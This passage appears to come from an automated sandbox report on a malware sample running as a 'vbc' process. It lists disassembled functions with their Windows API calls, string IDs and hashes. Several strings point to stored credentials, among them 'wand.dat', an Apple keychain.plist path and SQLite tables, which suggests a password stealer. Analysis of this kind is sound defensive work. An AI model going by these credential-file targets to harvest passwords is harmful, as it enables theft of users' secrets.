                                                                • Part of subcall function 00407AB6: wcscpy.MSVCRT ref: 00407B0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                              • String ID: *.*$dat$wand.dat
                                                              • API String ID: 3589925243-1828844352
                                                              • Opcode ID: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                              • Instruction ID: 6d0f55f818233349c8d1636aac4371a0276c995c789a620d4a51b657e5e4e923
                                                              • Opcode Fuzzy Hash: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                              • Instruction Fuzzy Hash: 6F419971A04206AFDB14EF61D885AAE77B4FF40314F10C42BFA05A71C2EF79A9958BD4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
                                                                • Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B
                                                              • wcslen.MSVCRT ref: 0040CBEF
                                                              • _wtoi.MSVCRT ref: 0040CBFB
                                                              • _wcsicmp.MSVCRT ref: 0040CC49
                                                              • _wcsicmp.MSVCRT ref: 0040CC5A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                              • String ID:
                                                              • API String ID: 1549203181-0
                                                              • Opcode ID: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                              • Instruction ID: 2e88af878a7a0ebae712eab1be6a0374a06ab0ac9bbd2c3eb3becf244d067ed8
                                                              • Opcode Fuzzy Hash: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                              • Instruction Fuzzy Hash: C3416D31900204EBEF21DF59C5C4A9DBBB4EF45319F1546BAEC09EB3A6D638D940CB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @|=D
                                                              • API String ID: 3510742995-4242725666
                                                              • Opcode ID: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                              • Instruction ID: e04d1c669876fac24280ac48723ffca9e388da4b41f072ca806e7767fffd92f4
                                                              • Opcode Fuzzy Hash: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                              • Instruction Fuzzy Hash: 19113BF29003047BDB348E66DC84C5A77A8EB603987000E3EF90696291F675DF69C6D8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: 452c36f54a95b1171074d049fff85ccf94a821efaed92727afe083bfedccad81
                                                              • Instruction ID: d20edd04bd2483e58964879576c48f2ebc5a647496c0cba51e85d391a6ad2c86
                                                              • Opcode Fuzzy Hash: 452c36f54a95b1171074d049fff85ccf94a821efaed92727afe083bfedccad81
                                                              • Instruction Fuzzy Hash: 0D118C71204601AFD328DF2DCA91A26F7E5FFD8340B60892EE4DAC7385EA75E801CB14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 00411ABC
                                                                • Part of subcall function 00407BF7: _snwprintf.MSVCRT ref: 00407C3C
                                                                • Part of subcall function 00407BF7: memcpy.MSVCRT ref: 00407C4C
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00411AE5
                                                              • memset.MSVCRT ref: 00411AEF
                                                              • GetPrivateProfileStringW.KERNEL32 ref: 00411B11
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                              • String ID:
                                                              • API String ID: 1127616056-0
                                                              • Opcode ID: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
                                                              • Instruction ID: 7dd1a1e3bfb09d1cc1018fb107044e1a6d1141f919409e292c6c821828e7f11b
                                                              • Opcode Fuzzy Hash: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
                                                              • Instruction Fuzzy Hash: 48118271500119BFEF11AF61DD02EDE7BB9EF04741F100066FF05B2060E675AA608BAD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 004123DC
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0041240E
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00412422
                                                              • wcscpy.MSVCRT ref: 00412435
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                              • String ID:
                                                              • API String ID: 3917621476-0
                                                              • Opcode ID: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
                                                              • Instruction ID: 5cda3e6a61a15ee9057d47663b3b2e0c0e874c437a77379260a47c7555d96391
                                                              • Opcode Fuzzy Hash: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
                                                              • Instruction Fuzzy Hash: C5110CB5A00208AFDB00DFA9D9889EEB7F8FF49714F10406AE905E7200D779EB45CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: sqlite_master
                                                              • API String ID: 438689982-3163232059
                                                              • Opcode ID: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
                                                              • Instruction ID: ee6e5cfbbe52718914f41d47f1c84030a85cc49ac4fd556a51d86816da10b362
                                                              • Opcode Fuzzy Hash: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
                                                              • Instruction Fuzzy Hash: 6901B972900218BAEB11EFB18D42FDDB77DFF04315F50405AF60462142D77A9B15C7A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,?,?), ref: 0040A0CD
                                                                • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                              • _snwprintf.MSVCRT ref: 0040CEFB
                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040CF60
                                                                • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                              • _snwprintf.MSVCRT ref: 0040CF26
                                                              • wcscat.MSVCRT ref: 0040CF39
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 822687973-0
                                                              • Opcode ID: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
                                                              • Instruction ID: 10942a5e8a652da15fc5691646fc128facbf295aae85401a998ce48512d7e6da
                                                              • Opcode Fuzzy Hash: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
                                                              • Instruction Fuzzy Hash: 8F0184B19403057AE720E775DC8AFBB73ACAF40709F04046AB719F21C3DA79A9454A6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,00414D8E,?), ref: 00414C81
                                                              • malloc.MSVCRT ref: 00414C88
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74B05970,?,00414D8E,?), ref: 00414CA7
                                                              • free.MSVCRT(00000000,?,74B05970,?,00414D8E,?), ref: 00414CAE
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: 347eddd0333b7b4fc224a180bb8d814daa6ee99946be5c2d175a3804e2d3aac7
                                                              • Instruction ID: 08e12ed7d8240a3e2c5be9bdce3f46534c50a62d4f36ceba048af803e5c5c189
                                                              • Opcode Fuzzy Hash: 347eddd0333b7b4fc224a180bb8d814daa6ee99946be5c2d175a3804e2d3aac7
                                                              • Instruction Fuzzy Hash: CBF0E9B260A21D7E76006FB59CC0C3B7B9CD7863FDB21072FF510A2180F9659C0116B5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 004153AA
                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004153D6
                                                              • GetLastError.KERNEL32 ref: 004153E4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                              • String ID:
                                                              • API String ID: 3727323765-0
                                                              • Opcode ID: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
                                                              • Instruction ID: b4c6314a975e1eba122d49f899d78a16df92238a1a9f5a4b2f2908291fae13bb
                                                              • Opcode Fuzzy Hash: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
                                                              • Instruction Fuzzy Hash: 7201D131100608FFDB219FA4EC848EBBBB8FB80785F20442AF912D6050D6B09A44CF25
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 00401B27
                                                              • wcslen.MSVCRT ref: 00401B40
                                                              • wcslen.MSVCRT ref: 00401B4E
                                                                • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcslen$memsetwcscatwcscpy
                                                              • String ID: Apple Computer\Preferences\keychain.plist
                                                              • API String ID: 3932597654-296063946
                                                              • Opcode ID: ba41a5c98105934d2654bb6be766342e051c669de4155293bef509ce0220feec
                                                              • Instruction ID: 16ca9930086f175389a7ca6d9dd60f6601f6a2e2e4035c9292d9b79f31a3f5d2
                                                              • Opcode Fuzzy Hash: ba41a5c98105934d2654bb6be766342e051c669de4155293bef509ce0220feec
                                                              • Instruction Fuzzy Hash: F8F0FE7290531476E720A7559C89FDA736C9F00318F6005B7F514E10C3F77CAA5446AD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 004030A6
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 004030C3
                                                              • strlen.MSVCRT ref: 004030D5
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004030E6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
                                                              • Instruction ID: e51875297eda531c80c3ec5ec415ee795d437164a5b9689062039e3667910632
                                                              • Opcode Fuzzy Hash: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
                                                              • Instruction Fuzzy Hash: 56F04FB680022CBEFB15AB949DC5DEB776CDB04254F0001A2B709E2041E5749F448B78
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040BA78
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00443980,00000000,00000000,00000000,?,00000000,00000000), ref: 0040BA91
                                                              • strlen.MSVCRT ref: 0040BAA3
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040BAB4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                              • Instruction ID: f1b04ddda804f0d23e85d9b3a1a681265272c1a7bd8491b11875ee0cd1c6d5d4
                                                              • Opcode Fuzzy Hash: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                              • Instruction Fuzzy Hash: 7CF06DB780022CBEFB059B94DDC9DEB77ACDB04258F0001A2B709E2042E6749F44CB78
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 004076CD: memset.MSVCRT ref: 004076EC
                                                                • Part of subcall function 004076CD: GetClassNameW.USER32 ref: 00407703
                                                                • Part of subcall function 004076CD: _wcsicmp.MSVCRT ref: 00407715
                                                              • SetBkMode.GDI32(?,00000001), ref: 00411794
                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004117A2
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004117B0
                                                              • GetStockObject.GDI32(00000000), ref: 004117B8
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                              • String ID:
                                                              • API String ID: 764393265-0
                                                              • Opcode ID: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                              • Instruction ID: 4524e9a356975b07e10c0673c8b36924071ef161512cc5bea393be377801c3c3
                                                              • Opcode Fuzzy Hash: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                              • Instruction Fuzzy Hash: 9AF0A435100209BBDF112F64DC05BDD3F61AF05B25F104636FA25541F5CF769990D648
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy$DialogHandleModuleParam
                                                              • String ID:
                                                              • API String ID: 1386444988-0
                                                              • Opcode ID: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                              • Instruction ID: 350a086b8d7ad7ad16c9f4c49a9849c7d3de4f0e2d0f3119e9b48998a0ebe44a
                                                              • Opcode Fuzzy Hash: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                              • Instruction Fuzzy Hash: 49F0A731680310BBEB70AFA4BD4AF163A919705F57F20043AF644A60E2C7B585558B9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetDlgItem.USER32 ref: 004048DE
                                                                • Part of subcall function 00412455: LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,004048E6,00000000), ref: 0041245E
                                                                • Part of subcall function 00412455: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                                • Part of subcall function 00412455: FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                              • GetDlgItem.USER32 ref: 004048F0
                                                              • GetDlgItem.USER32 ref: 00404902
                                                              • GetDlgItem.USER32 ref: 00404914
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Item$Library$AddressFreeLoadProc
                                                              • String ID:
                                                              • API String ID: 2406072140-0
                                                              • Opcode ID: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                              • Instruction ID: 27d5e7a410d711f85fb169ee5f4284aad0304eb1bf7711d039073b83f91ac3c5
                                                              • Opcode Fuzzy Hash: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                              • Instruction Fuzzy Hash: 33F01CB18043026BCB313F72DC09D6FBAADEF84310B010D2EA1D1D61A1CFBE94618A98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: f4226ff83adb891658747bcdf7367db92b78b087d1031712a816736b3e9b12be
                                                              • Instruction ID: 4d75bcbf83e2a718e0a773ad5cf6a383805f84e699810b963ae7674306c23c36
                                                              • Opcode Fuzzy Hash: f4226ff83adb891658747bcdf7367db92b78b087d1031712a816736b3e9b12be
                                                              • Instruction Fuzzy Hash: 05E080A1705301777A105B36BE55B0313EC3A703423D8041FF40AC3255DEBCC840441C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: Y,A$a,A
                                                              • API String ID: 3510742995-1618166904
                                                              • Opcode ID: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
                                                              • Instruction ID: c1edbe63f0487e6d5a9ef4690cfcbd933ff0b0d7cc0200e8d9d6566c39fc0ab4
                                                              • Opcode Fuzzy Hash: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
                                                              • Instruction Fuzzy Hash: C8E04F35980610EAF330DB459C07B863394A796756F50C43BF508A6193C6FC599C8B9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0040DA6F
                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 0040DABB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InvalidateMessageRectSend
                                                              • String ID: <M@
                                                              • API String ID: 909852535-3778786622
                                                              • Opcode ID: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                              • Instruction ID: 05eea1ce1b03382e5db893e26ff0cd35ef39184770bc15fe2d13ad66f6086966
                                                              • Opcode Fuzzy Hash: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                              • Instruction Fuzzy Hash: 89518430E003049ADB20AFA5C845F9EB3A5AF44324F51853BF4197B1E2CAB99D89CB5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • wcschr.MSVCRT ref: 0040BB00
                                                              • wcschr.MSVCRT ref: 0040BB0E
                                                                • Part of subcall function 004080BF: wcslen.MSVCRT ref: 004080DB
                                                                • Part of subcall function 004080BF: memcpy.MSVCRT ref: 004080FE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcschr$memcpywcslen
                                                              • String ID: "
                                                              • API String ID: 1983396471-123907689
                                                              • Opcode ID: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                              • Instruction ID: 425732c6536ade4c189e7d45363e94d8349111ce0189a23fa1b0a907d348dab1
                                                              • Opcode Fuzzy Hash: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                              • Instruction Fuzzy Hash: D2317E31904204ABDF04EFA5C8419EEB7F8EF44364B20816BE855B72D5DB78AA41CADC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
                                                              • _memicmp.MSVCRT ref: 004092A6
                                                              • memcpy.MSVCRT ref: 004092BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FilePointer_memicmpmemcpy
                                                              • String ID: URL
                                                              • API String ID: 2108176848-3574463123
                                                              • Opcode ID: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                              • Instruction ID: 33b3fc867a4e2474f07ea88972ed825a8fcb80c5477311fdb059a6d734a7dbfa
                                                              • Opcode Fuzzy Hash: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                              • Instruction Fuzzy Hash: 8411A031604208BBEB11DF29CC05F5F7BA8AF85348F054066F904AB2D2E775EE10CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _snwprintfmemcpy
                                                              • String ID: %2.2X
                                                              • API String ID: 2789212964-323797159
                                                              • Opcode ID: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                              • Instruction ID: 0f19ce75f7d61601c6dcaf4457f6717ff276ffca2b35b3dd887d371e09c964f6
                                                              • Opcode Fuzzy Hash: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                              • Instruction Fuzzy Hash: 87117C32908209BEEB10DFE8C9C69AE73A8BB45714F108436ED15E7141D678AA158BA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _snwprintf.MSVCRT ref: 0040BD3E
                                                              • _snwprintf.MSVCRT ref: 0040BD5E
                                                                • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _snwprintf$FileWritewcslen
                                                              • String ID: %%-%d.%ds
                                                              • API String ID: 889019245-2008345750
                                                              • Opcode ID: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
                                                              • Instruction ID: f6bde454874e3f12fe5a715dcb314e2825e8b387052435345983f70e28f49e73
